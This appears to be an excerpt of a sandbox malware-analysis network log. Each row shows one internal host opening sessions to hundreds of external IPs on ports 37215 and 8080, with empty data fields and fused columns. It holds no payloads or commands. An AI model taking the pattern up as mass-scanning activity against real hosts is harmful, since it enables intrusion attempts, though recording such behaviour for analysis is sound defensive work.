                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12576192.168.2.2335136157.92.109.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12577192.168.2.2352660197.81.123.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12578192.168.2.234766618.4.233.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12579192.168.2.235477841.24.204.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12580192.168.2.2337564174.186.167.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12581192.168.2.2338956197.134.134.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12582192.168.2.2350218157.163.130.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12583192.168.2.2338134197.136.104.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12584192.168.2.2360946197.45.250.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12585192.168.2.2344024197.78.224.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12586192.168.2.2357820167.48.151.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12587192.168.2.2343468197.12.192.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12588192.168.2.2357924197.77.49.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12589192.168.2.2351314197.162.165.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12590192.168.2.233363841.7.43.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12591192.168.2.2355268157.221.243.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12592192.168.2.2339024157.60.62.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12593192.168.2.2357744157.157.144.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12594192.168.2.2337290197.200.230.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12595192.168.2.2358678157.252.205.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12596192.168.2.2346776157.241.56.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12597192.168.2.235451441.198.124.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12598192.168.2.233744041.189.11.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12599192.168.2.2344622197.13.238.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12600192.168.2.2339784146.247.68.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12601192.168.2.2358050197.15.171.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12602192.168.2.2341738197.248.199.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12603192.168.2.2349800157.12.224.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12604192.168.2.2352134143.32.234.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12605192.168.2.2346592157.147.160.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12606192.168.2.235369441.119.47.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12607192.168.2.2334686197.68.92.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12608192.168.2.2358210131.238.92.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12609192.168.2.2337404140.103.179.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12610192.168.2.2333112197.95.167.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12611192.168.2.233865441.168.119.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12612192.168.2.2348440157.156.29.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12613192.168.2.235124841.165.141.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12614192.168.2.235327441.27.82.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12615192.168.2.2345800157.9.163.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12616192.168.2.234793441.83.147.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12617192.168.2.2355860157.48.187.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12618192.168.2.233532017.204.99.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12619192.168.2.2343952119.203.11.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12620192.168.2.234828241.48.49.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12621192.168.2.2348318201.103.61.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12622192.168.2.2335802197.165.99.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12623192.168.2.2359656157.32.16.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12624192.168.2.233867241.6.96.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12625192.168.2.2358390197.136.2.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12626192.168.2.2339780157.71.249.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12627192.168.2.2355262133.33.228.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12628192.168.2.234815048.219.95.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12629192.168.2.236007041.228.155.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12630192.168.2.2353444157.228.239.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12631192.168.2.2355590157.199.214.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12632192.168.2.2352544110.192.27.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12633192.168.2.2345464197.19.46.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12634192.168.2.2343032157.34.225.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12635192.168.2.2334632197.194.227.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12636192.168.2.2333576134.150.238.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12637192.168.2.234433241.154.205.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12638192.168.2.2356438197.80.172.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12639192.168.2.2334302197.207.37.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12640192.168.2.2345786207.239.58.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12641192.168.2.235286841.245.161.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12642192.168.2.2339840186.30.241.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12643192.168.2.2349926157.110.32.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12644192.168.2.235331241.168.222.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12645192.168.2.2344132197.115.62.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12646192.168.2.234448665.107.76.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12647192.168.2.2350872129.210.21.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12648192.168.2.2341158151.84.225.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12649192.168.2.2342338197.67.23.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12650192.168.2.2348354197.222.4.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12651192.168.2.2351128197.54.177.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12652192.168.2.2344850113.241.12.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12653192.168.2.233403641.84.126.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12654192.168.2.2354008157.130.69.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12655192.168.2.2358180167.177.240.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12656192.168.2.233544041.97.244.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12657192.168.2.2360558197.230.96.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12658192.168.2.235651887.4.201.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12659192.168.2.2353936219.11.231.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12660192.168.2.2351220157.247.201.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12661192.168.2.2354934158.57.245.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12662192.168.2.233536041.87.164.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12663192.168.2.2353066197.104.71.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12664192.168.2.234170846.226.123.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12665192.168.2.233862441.8.211.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12666192.168.2.234679041.170.21.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12667192.168.2.235813841.214.242.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12668192.168.2.2345274166.88.212.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12669192.168.2.233743219.226.210.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12670192.168.2.234702041.158.182.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12671192.168.2.2355452197.199.166.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12672192.168.2.2341084157.66.228.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12673192.168.2.233660641.131.76.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12674192.168.2.2356018157.59.7.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12675192.168.2.234613273.46.122.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12676192.168.2.2351066157.78.80.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12677192.168.2.2346544197.6.104.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12678192.168.2.2354682197.224.176.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12679192.168.2.233782431.166.113.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12680192.168.2.2332814207.253.139.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12681192.168.2.2355714157.54.84.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12682192.168.2.235299841.116.122.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12683192.168.2.234265884.198.143.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12684192.168.2.2332774157.203.138.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12685192.168.2.233910890.197.246.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12686192.168.2.2339834217.229.108.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12687192.168.2.2359032197.24.66.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12688192.168.2.2352734197.62.186.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12689192.168.2.2355530197.14.158.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12690192.168.2.2352354157.41.109.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12691192.168.2.2354144157.63.8.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12692192.168.2.2341152206.60.66.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12693192.168.2.2357636202.144.113.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12694192.168.2.2358514197.109.246.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12695192.168.2.2354498157.148.35.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12696192.168.2.2335960157.23.85.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12697192.168.2.2350198197.62.141.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12698192.168.2.235432441.103.120.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12699192.168.2.233808837.97.30.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12700192.168.2.2356944157.253.137.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12701192.168.2.2360676157.42.0.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12702192.168.2.2349484121.15.165.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12703192.168.2.2335500157.243.233.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12704192.168.2.233531641.125.107.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12705192.168.2.2355444200.24.216.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12706192.168.2.233325241.62.124.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12707192.168.2.234752441.94.103.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12708192.168.2.236093241.84.155.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12709192.168.2.2349064157.137.13.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12710192.168.2.234704263.143.72.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12711192.168.2.235550660.64.220.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12712192.168.2.2346762197.70.25.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12713192.168.2.235006040.37.250.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12714192.168.2.2354976197.15.100.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12715192.168.2.2357948197.6.185.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12716192.168.2.2342044157.168.49.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12717192.168.2.234446241.224.147.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12718192.168.2.234977241.146.135.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12719192.168.2.2349436157.240.177.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12720192.168.2.235075860.123.95.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12721192.168.2.2340790157.68.137.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12722192.168.2.235469664.56.22.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12723192.168.2.2346638144.81.14.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12724192.168.2.2335112157.223.175.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12725192.168.2.2350274220.54.253.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12726192.168.2.2353164117.240.104.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12727192.168.2.234730658.122.113.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12728192.168.2.2333012201.138.223.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12729192.168.2.234498040.194.45.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12730192.168.2.233931261.4.37.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12731192.168.2.2359112164.226.242.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12732192.168.2.2347932170.121.26.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12733192.168.2.235788081.50.141.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12734192.168.2.235072832.186.185.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12735192.168.2.2347310187.18.90.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12736192.168.2.233318284.227.115.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12737192.168.2.234923289.0.38.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12738192.168.2.2343130170.117.172.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12739192.168.2.2342544173.164.15.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12740192.168.2.2355460113.15.185.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12741192.168.2.234940091.141.229.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12742192.168.2.2358424197.6.90.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12743192.168.2.235691886.86.176.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12744192.168.2.234401845.119.99.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12745192.168.2.2359464138.9.153.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12746192.168.2.2338012139.214.190.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12747192.168.2.234254884.35.142.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12748192.168.2.234510238.120.157.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12749192.168.2.2346856162.109.151.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12750192.168.2.234834827.118.142.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12751192.168.2.234623246.227.121.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12752192.168.2.2354824181.177.76.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12753192.168.2.235202813.1.21.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12754192.168.2.2337426101.40.57.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12755192.168.2.2344198119.46.73.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12756192.168.2.2348718155.179.219.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12757192.168.2.233664299.141.40.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12758192.168.2.235999488.25.82.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12759192.168.2.2342062125.97.242.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12760192.168.2.2352282199.131.161.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12761192.168.2.2354282149.236.12.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12762192.168.2.2334390208.212.156.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12763192.168.2.235739434.244.195.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12764192.168.2.233474237.203.69.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12765192.168.2.235295853.56.158.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12766192.168.2.2333020182.177.15.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12767192.168.2.2351416163.22.35.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12768192.168.2.2356036124.116.7.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12769192.168.2.2346812183.162.0.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12770192.168.2.2360418206.131.80.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12771192.168.2.234174695.168.149.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12772192.168.2.235521489.1.24.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12773192.168.2.2344924161.204.251.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12774192.168.2.2346784209.27.225.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12775192.168.2.236033037.53.251.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12776192.168.2.2360176177.169.51.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12777192.168.2.234226841.186.106.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12778192.168.2.235822442.45.89.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12779192.168.2.2360744156.202.116.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12780192.168.2.235161269.74.186.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12781192.168.2.235715897.185.68.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12782192.168.2.2334476166.58.175.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12783192.168.2.235201099.130.129.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12784192.168.2.2345874102.100.171.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12785192.168.2.233311893.93.197.2018080
